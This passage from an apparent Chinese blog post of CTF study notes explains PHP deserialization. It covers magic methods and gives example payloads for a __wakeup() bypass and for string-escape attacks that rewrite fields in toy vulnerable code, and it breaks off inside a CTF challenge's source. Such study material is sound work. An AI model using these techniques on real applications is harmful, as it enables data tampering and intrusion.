<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#0078E7"><meta name="author" content="伊卡洛维奇"><meta name="copyright" content="伊卡洛维奇"><meta name="generator" content="Hexo 7.3.0"><meta name="theme" content="hexo-theme-yun"><title>php反序列化知识处理 | Ikalovic@Hexo</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/star-markdown-css@0.4.1/dist/yun/yun-markdown.min.css"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/prism-theme-vars/base.css"><script src="https://fastly.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>function initScrollReveal() {
  [".post-card",".markdown-body img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
}
document.addEventListener("DOMContentLoaded", initScrollReveal);
document.addEventListener("pjax:success", initScrollReveal);
</script><link rel="icon" type="image/png" href="/favicon.ico"><link rel="mask-icon" href="/favicon.ico" color="#0078E7"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><link rel="preconnect" href="https://fastly.jsdelivr.net/npm/" crossorigin><script id="yun-config">
    window.Yun = {}
    window.CONFIG = {"hostname":"lunereal.1kal0vic.top","root":"/","title":"kawayi","version":"1.10.11","mode":"auto","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"搜索...","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）"},"anonymous_image":"https://cdn.yunyoujun.cn/img/avatar/none.jpg","say":{"api":"https://el-bot-api.vercel.app/api/words/young"},"fireworks":{"colors":null},"vendors":{"host":"https://fastly.jsdelivr.net/npm/","darken":"https://fastly.jsdelivr.net/npm/darken@1.5.0"}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/hexo-theme-yun.js" type="module"></script><meta name="description" content="php反序列化本文参考php反序列化完整总结-先知社区 什么是序列化和反序列化​	在web中，因为具有多种数据类型，所以数据的传递其实并不方便，而为了简便，序列化应运而生。 ​	序列化是指将变量（比如int，arr，object）转换为一种可保存或传输的字符串形式的过程；而反序列化则是在需要的时候，将这个字符串重新转换回原来的变量形式以供使用。这两个过程相辅相成，为数据的存储和传输提供了极大的便利">
<meta property="og:type" content="article">
<meta property="og:title" content="php反序列化知识处理">
<meta property="og:url" content="http://lunereal.1kal0vic.top/2026/02/26/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/index.html">
<meta property="og:site_name" content="Ikalovic@Hexo">
<meta property="og:description" content="php反序列化本文参考php反序列化完整总结-先知社区 什么是序列化和反序列化​	在web中，因为具有多种数据类型，所以数据的传递其实并不方便，而为了简便，序列化应运而生。 ​	序列化是指将变量（比如int，arr，object）转换为一种可保存或传输的字符串形式的过程；而反序列化则是在需要的时候，将这个字符串重新转换回原来的变量形式以供使用。这两个过程相辅相成，为数据的存储和传输提供了极大的便利">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://lunereal.1kal0vic.top/2026/02/26/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/Users/30882/Desktop/%E4%B8%AA%E4%BA%BA%E5%8D%9A%E5%AE%A2/source/images/img/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%95%B4%E7%90%86/1..png">
<meta property="article:published_time" content="2026-02-26T14:00:23.000Z">
<meta property="article:modified_time" content="2026-02-27T13:29:47.914Z">
<meta property="article:author" content="伊卡洛维奇">
<meta property="article:tag" content="-web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://lunereal.1kal0vic.top/2026/02/26/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/Users/30882/Desktop/%E4%B8%AA%E4%BA%BA%E5%8D%9A%E5%AE%A2/source/images/img/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%95%B4%E7%90%86/1..png"><script>(function() {
  if (CONFIG.mode !== 'auto') return
  const prefersDark = window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches
  const setting = localStorage.getItem('darken-mode') || 'auto'
  if (setting === 'dark' || (prefersDark && setting !== 'light'))
    document.documentElement.classList.toggle('dark', true)
})()</script></head><body><script src="https://code.iconify.design/2/2.1.1/iconify.min.js"></script><script>// Define global variable
IconifyProviders = {
  // Empty prefix: overwrite default API provider configuration
  '': {
    // Use custom API first, use Iconify public API as backup
    resources: [
        'https://api.iconify.design',
    ],
    // Wait for 1 second before switching API hosts
    rotate: 1000,
  },
};</script><script defer src="https://fastly.jsdelivr.net/npm/animejs@latest"></script><script defer src="/js/ui/fireworks.js" type="module"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js" type="module"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><span class="icon iconify" data-icon="ri:list-ordered"></span></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><span class="icon iconify" data-icon="ri:passport-line"></span></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="伊卡洛维奇"><img width="96" loading="lazy" src="/images/avatar.jpg" alt="伊卡洛维奇"><span class="site-author-status" title="loli赛高">☺️</span></a><div class="site-author-name"><a href="/about/">伊卡洛维奇</a></div><span class="site-name">Ikalovic@Hexo</span><sub class="site-subtitle">kawayi</sub><div class="site-description">loli赛高</div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:home-4-line"></span></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:archive-line"></span></span><span class="site-state-item-count">22</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:folder-2-line"></span></span><span class="site-state-item-count">7</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="site-state-item-count">4</span></a></div><div class="site-state-item"><a href="/girls/"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:women-line"></span></span></a></div><a class="site-state-item hty-icon-button" target="_blank" rel="noopener" href="https://yun.yunyoujun.cn" title="文档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:settings-line"></span></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" href="/atom.xml" title="RSS" target="_blank" style="color:orange"><span class="icon iconify" data-icon="ri:rss-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://github.com/Ikalovic" title="GitHub" target="_blank" style="color:#181717"><span class="icon iconify" data-icon="ri:github-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://space.bilibili.com/327357699" title="哔哩哔哩" target="_blank" style="color:#FF8EB3"><span class="icon iconify" data-icon="ri:bilibili-line"></span></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们" style="color:dodgerblue"><span class="icon iconify" data-icon="ri:genderless-line"></span></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><span class="icon iconify" data-icon="ri:contrast-2-line"></span></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="toc-number">1.</span> <span class="toc-text">php反序列化</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="toc-number">1.1.</span> <span class="toc-text">什么是序列化和反序列化</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#php%E5%8F%8D%E5%BA%8F%E5%88%97%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95"><span class="toc-number">1.2.</span> <span class="toc-text">php反序列魔术方法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E4%BA%9B%E5%BF%85%E8%A6%81%E7%9A%84%E7%9F%A5%E8%AF%86%E7%82%B9%E5%92%8C%E7%BB%95%E8%BF%87%E6%89%8B%E6%AE%B5"><span class="toc-number">1.3.</span> <span class="toc-text">一些必要的知识点和绕过手段</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-wakeup-%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.1.</span> <span class="toc-text">1.__wakeup()绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-protect%E5%92%8Cpublic%E5%BA%8F%E5%88%97%E5%8C%96%E7%9A%84%E5%8C%BA%E5%88%AB"><span class="toc-number">1.3.2.</span> <span class="toc-text">2.protect和public序列化的区别</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E5%AD%97%E7%AC%A6%E4%B8%B2%E9%80%83%E9%80%B8"><span class="toc-number">1.3.3.</span> <span class="toc-text">3.字符串逃逸</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#a-%E5%AD%97%E7%AC%A6%E4%B8%B2%E8%BF%87%E6%BB%A4%E5%90%8E%E5%8F%98%E9%95%BF"><span class="toc-number">1.3.3.1.</span> <span class="toc-text">a.字符串过滤后变长</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#b-%E5%AD%97%E7%AC%A6%E4%B8%B2%E8%BF%87%E6%BB%A4%E5%90%8E%E5%8F%98%E7%9F%AD"><span class="toc-number">1.3.3.2.</span> <span class="toc-text">b.字符串过滤后变短</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-php%E5%8E%9F%E7%94%9F%E7%B1%BB%E5%BA%94%E7%94%A8"><span class="toc-number">1.3.4.</span> <span class="toc-text">4.php原生类应用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-phar%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="toc-number">1.3.5.</span> <span class="toc-text">5.phar反序列化</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%A6%81%E6%B1%82"><span class="toc-number">1.3.5.1.</span> <span class="toc-text">要求</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95"><span class="toc-number">1.3.5.2.</span> <span class="toc-text">绕过方法</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#6-session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="toc-number">1.3.6.</span> <span class="toc-text">6.session反序列化</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E9%80%A0%E6%88%90%E5%8E%9F%E7%90%86%EF%BC%9A"><span class="toc-number">1.3.7.</span> <span class="toc-text">漏洞造成原理：</span></a></li></ol></li></ol></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article" style="--smc-primary:#0078E7;"><link itemprop="mainEntityOfPage" href="http://lunereal.1kal0vic.top/2026/02/26/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="伊卡洛维奇"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="Ikalovic@Hexo"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">php反序列化知识处理</h1><div class="post-meta"><div class="post-time"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-line"></span></span> <time title="创建时间：2026-02-26 22:00:23" itemprop="dateCreated datePublished" datetime="2026-02-26T22:00:23+08:00">2026-02-26</time><span class="post-meta-divider">-</span><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-2-line"></span></span> <time title="修改时间：2026-02-27 21:29:47" itemprop="dateModified" datetime="2026-02-27T21:29:47+08:00">2026-02-27</time></div><div class="post-classify"><span class="post-category"> <span class="post-meta-item-icon" style="margin-right:3px;"><span class="icon iconify" data-icon="ri:folder-line"></span></span><span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category-item" href="/categories/%E7%9F%A5%E8%AF%86%E7%A7%AF%E7%B4%AF/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">-知识积累</span></a></span></span><span class="post-tag"><span class="post-meta-divider">-</span><a class="tag-item" href="/tags/web/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="tag-name">-web</span></a></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body"><h1 id="php反序列化"><a href="#php反序列化" class="headerlink" title="php反序列化"></a>php反序列化</h1><p>本文参考<a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/11953">php反序列化完整总结-先知社区</a></p>
<h2 id="什么是序列化和反序列化"><a href="#什么是序列化和反序列化" class="headerlink" title="什么是序列化和反序列化"></a>什么是序列化和反序列化</h2><p>​	在web中，因为具有多种数据类型，所以数据的传递其实并不方便，而为了简便，序列化应运而生。</p>
<p>​	序列化是指将变量（比如int，arr，object）转换为一种可保存或传输的字符串形式的过程；而反序列化则是在需要的时候，将这个字符串重新转换回原来的变量形式以供使用。这两个过程相辅相成，为数据的存储和传输提供了极大的便利，同时也使得程序更加易于维护和扩展。</p>
<p>​	而在php反序列化的做题过程中，我们往往都是接触到object即对象。</p>
<p>​	这也就要求对面向对象编程有点了解。</p>
<p>​	面向对象的详情可以参考<a target="_blank" rel="noopener" href="https://www.runoob.com/php/php-oop.html">PHP 面向对象 | 菜鸟教程</a></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">TestClass</span> //定义一个类</span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line"><span class="comment">//一个变量</span></span><br><span class="line"><span class="keyword">public</span> <span class="variable">$variable</span> = <span class="string">&#x27;This is a string&#x27;</span>;</span><br><span class="line"><span class="comment">//一个方法</span></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">PrintVariable</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"><span class="keyword">echo</span> <span class="variable language_">$this</span>-&gt;variable;</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">//创建一个对象</span></span><br><span class="line"><span class="variable">$object</span> = <span class="keyword">new</span> <span class="title class_">TestClass</span>();</span><br><span class="line"><span class="comment">//调用一个方法</span></span><br><span class="line"><span class="variable">$object</span>-&gt;<span class="title function_ invoke__">PrintVariable</span>();</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>PHP 对属性或方法的<strong>访问控制</strong>，是通过在前面添加<strong>关键字</strong> public（公有），protected（受保护）或 private（私有）来实现的。<br>public（公有）：公有的类成员可以在<strong>任何地方被访问</strong>。<br>protected（受保护）：受保护的类成员则可以<strong>被其自身以及其子类和父类访问</strong>。<br>private（私有）：私有的类成员则<strong>只能被其定义所在的类访问</strong>。</p>
<p>注意：不同修饰符序列化后的值不一样</p>
<p>访问控制修饰符的不同，序列化后属性的长度和属性值会有所不同，如下所示：</p>
<p>public：属性被序列化的时候属性值会变成属性名<br>protected：属性被序列化的时候属性值会变成\x00*\x00属性名<br>private：属性被序列化的时候属性值会变成\x00类名\x00属性名<br>其中：\x00表示空字符，但是还是占用一个字符位置</p>
<h2 id="php反序列魔术方法"><a href="#php反序列魔术方法" class="headerlink" title="php反序列魔术方法"></a>php反序列魔术方法</h2><p>详情可以参考<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/language.oop5.magic.php">PHP: 魔术方法 - Manual</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">__construct()//创建对象时触发</span><br><span class="line">__destruct() //对象被销毁时触发</span><br><span class="line">__toString()//对象被当成字符串时触发，比如echo</span><br><span class="line">__call() //在对象上下文中调用不可访问的方法时触发</span><br><span class="line">__callStatic() //在静态上下文中调用不可访问的方法时触发</span><br><span class="line">__sleep()//用于在对象被序列化（serialized）时触发</span><br><span class="line">__wakeup()//用于在对象被反序列化（unserialized）时触发</span><br><span class="line">__get() //用于从不可访问的属性读取数据</span><br><span class="line">__set() //用于将数据写入不可访问的属性</span><br><span class="line">__isset() //在不可访问的属性上调用isset()或empty()触发</span><br><span class="line">__unset() //在不可访问的属性上使用unset()时触发</span><br><span class="line">__invoke() //当脚本尝试将对象调用为函数时触发</span><br></pre></td></tr></table></figure>

<h2 id="一些必要的知识点和绕过手段"><a href="#一些必要的知识点和绕过手段" class="headerlink" title="一些必要的知识点和绕过手段"></a>一些必要的知识点和绕过手段</h2><h3 id="1-wakeup-绕过"><a href="#1-wakeup-绕过" class="headerlink" title="1.__wakeup()绕过"></a>1.__wakeup()绕过</h3><p>在 unserialize() 之后会执行 __wake() 方法，但是如果，所给参数个数与实际参数个数不符，则不会执行 __wake(),例如</p>
<p>比如</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">正常为O:<span class="number">4</span>:”Name”:<span class="number">2</span>:&#123;s:<span class="number">14</span>:”Nameusername”;s:<span class="number">5</span>:”admin”;s:<span class="number">14</span>:”Namepassword”;i:<span class="number">100</span>;&#125;</span><br><span class="line">绕过为<span class="string">&#x27;O:4:&quot;Name&quot;:3:&#123;s:14:&quot;Nameusername&quot;;s:5:&quot;admin&quot;;s:14:&quot;Namepassword&quot;;i:100;&#125;&#x27;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="2-protect和public序列化的区别"><a href="#2-protect和public序列化的区别" class="headerlink" title="2.protect和public序列化的区别"></a>2.protect和public序列化的区别</h3><p>PHP在序列化含有private和protected权限的变量时，会在变量名前添加ASCII码为0的不可见字符，表现为<code>%00类名%00属性名</code>和<code>%00*%00属性名</code>。这些字符在显示和输出时可能不易察觉，甚至导致数据截断。为了清晰查看，可将序列化后的字符串进行urlencode编码后打印输出。</p>
<h3 id="3-字符串逃逸"><a href="#3-字符串逃逸" class="headerlink" title="3.字符串逃逸"></a>3.字符串逃逸</h3><p>特点1：php在反序列化时，底层代码是以 ; 作为字段的分隔，以 } 作为结尾，并且是根据长度判断内容的 ，同时反序列化的过程中必须严格按照序列化规则才能成功实现反序列化 ，超出的部分并不会被反序列化成功，这说明反序列化的过程是有一定识别范围的，在这个范围之外的字符都会被忽略，不影响反序列化的正常进行。而且可以看到反序列化字符串都是以***”;}*<strong>结束的，那如果把</strong>*”;}***添入到需要反序列化的字符串中（除了结尾处），就能让反序列化提前闭合结束，后面的内容就相应的丢弃了。<br>特点2：长度不对应会报错</p>
<p>漏洞产生：反序列化之所以存在字符逃逸，最主要的原因是代码中存在针对序列化（serialize()）后的字符串进行了过滤操作（变多或者变少）。</p>
<p><strong>漏洞常见条件：序列化后过滤再去反序列化</strong></p>
<h4 id="a-字符串过滤后变长"><a href="#a-字符串过滤后变长" class="headerlink" title="a.字符串过滤后变长"></a>a.字符串过滤后变长</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">filter</span>(<span class="params"><span class="variable">$str</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;bb&#x27;</span>, <span class="string">&#x27;ccc&#x27;</span>, <span class="variable">$str</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">A</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">        <span class="keyword">public</span> <span class="variable">$name</span> = <span class="string">&#x27;aaaa&#x27;</span>;</span><br><span class="line">        <span class="keyword">public</span> <span class="variable">$pass</span> = <span class="string">&#x27;123456&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$AA</span> = <span class="keyword">new</span> <span class="title function_ invoke__">A</span>();</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">serialize</span>(<span class="variable">$AA</span>) . <span class="string">&quot;\n&quot;</span>;</span><br><span class="line"><span class="variable">$res</span> = <span class="title function_ invoke__">filter</span>(<span class="title function_ invoke__">serialize</span>(<span class="variable">$AA</span>));</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$res</span>.<span class="string">&quot;\n&quot;</span>;</span><br><span class="line"><span class="variable">$c</span>=<span class="title function_ invoke__">unserialize</span>(<span class="variable">$res</span>);</span><br><span class="line"><span class="title function_ invoke__">var_dump</span>(<span class="variable">$c</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;s:4:&quot;name&quot;;s:81:&quot;bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb&quot;;s:4:&quot;pass&quot;;s:6:&quot;hacker&quot;;&#125;&quot;;s:4:&quot;pass&quot;;s:6:&quot;123456&quot;;&#125;</span><br></pre></td></tr></table></figure>

<p>可以通过修改name使得pass的值变成hacker</p>
<p>这里其实就是利用了filter函数可以替换增加字符串，每增加一个bb，在过滤函数filter替换之后会多一个字符串，我们需要构造的payload***”;s:4:”pass”;s:6:”hacker”;}***是27个字符串，所以我们加上27个bb是为了多出27个字符</p>
<h4 id="b-字符串过滤后变短"><a href="#b-字符串过滤后变短" class="headerlink" title="b.字符串过滤后变短"></a>b.字符串过滤后变短</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">str_rep</span>(<span class="params"><span class="variable">$string</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="title function_ invoke__">preg_replace</span>( <span class="string">&#x27;/php|test/&#x27;</span>,<span class="string">&#x27;&#x27;</span>, <span class="variable">$string</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$test</span>[<span class="string">&#x27;name&#x27;</span>] = <span class="variable">$_GET</span>[<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line"><span class="variable">$test</span>[<span class="string">&#x27;sign&#x27;</span>] = <span class="variable">$_GET</span>[<span class="string">&#x27;sign&#x27;</span>]; </span><br><span class="line"><span class="variable">$test</span>[<span class="string">&#x27;number&#x27;</span>] = <span class="string">&#x27;2020&#x27;</span>;</span><br><span class="line"><span class="variable">$temp</span> = <span class="title function_ invoke__">str_rep</span>(<span class="title function_ invoke__">serialize</span>(<span class="variable">$test</span>));</span><br><span class="line"><span class="title function_ invoke__">printf</span>(<span class="variable">$temp</span>);</span><br><span class="line"><span class="variable">$fake</span> = <span class="title function_ invoke__">unserialize</span>(<span class="variable">$temp</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;&lt;br&gt;&#x27;</span>;</span><br><span class="line"><span class="keyword">print</span>(<span class="string">&quot;name:&quot;</span>.<span class="variable">$fake</span>[<span class="string">&#x27;name&#x27;</span>].<span class="string">&#x27;&lt;br&gt;&#x27;</span>);</span><br><span class="line"><span class="keyword">print</span>(<span class="string">&quot;sign:&quot;</span>.<span class="variable">$fake</span>[<span class="string">&#x27;sign&#x27;</span>].<span class="string">&#x27;&lt;br&gt;&#x27;</span>);</span><br><span class="line"><span class="keyword">print</span>(<span class="string">&quot;number:&quot;</span>.<span class="variable">$fake</span>[<span class="string">&#x27;number&#x27;</span>].<span class="string">&#x27;&lt;br&gt;&#x27;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>我们需要控制name和sign来改变number。</p>
<p>payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">name=testtesttesttesttesttest&amp;sign=hello&quot;;s:4:&quot;sign&quot;;s:4:&quot;eval&quot;;s:6:&quot;number&quot;;s:4:&quot;2000&quot;;&#125;</span><br></pre></td></tr></table></figure>

<h3 id="4-php原生类应用"><a href="#4-php原生类应用" class="headerlink" title="4.php原生类应用"></a>4.php原生类应用</h3><p>以新生赛ezunser为例子</p>
<p>代码如下:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="variable">$ser_a1</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;a&#x27;</span>];</span><br><span class="line"><span class="variable">$ser_b1</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;b&#x27;</span>];</span><br><span class="line"><span class="variable">$c</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="variable">$obj_a1</span> = <span class="title function_ invoke__">unserialize</span>(<span class="variable">$ser_a1</span>);</span><br><span class="line"><span class="variable">$obj_b1</span> = <span class="title function_ invoke__">unserialize</span>(<span class="variable">$ser_b1</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$ser_a2</span> = <span class="title function_ invoke__">serialize</span>(<span class="title function_ invoke__">unserialize</span>(<span class="variable">$ser_a1</span>));</span><br><span class="line"><span class="variable">$ser_b2</span> = <span class="title function_ invoke__">serialize</span>(<span class="title function_ invoke__">unserialize</span>(<span class="variable">$ser_b1</span>));</span><br><span class="line"></span><br><span class="line"><span class="variable">$obj_a2</span> = <span class="title function_ invoke__">unserialize</span>(<span class="variable">$ser_a2</span>);</span><br><span class="line"><span class="variable">$obj_b2</span> = <span class="title function_ invoke__">unserialize</span>(<span class="variable">$ser_b2</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="title function_ invoke__">get_class</span>(<span class="variable">$obj_a1</span>) === <span class="title function_ invoke__">get_class</span>(<span class="variable">$obj_a2</span>) || <span class="title function_ invoke__">get_class</span>(<span class="variable">$obj_b1</span>) === <span class="title function_ invoke__">get_class</span>(<span class="variable">$obj_b2</span>))&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;Nope&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$ser_a1</span> != <span class="variable">$ser_a2</span> 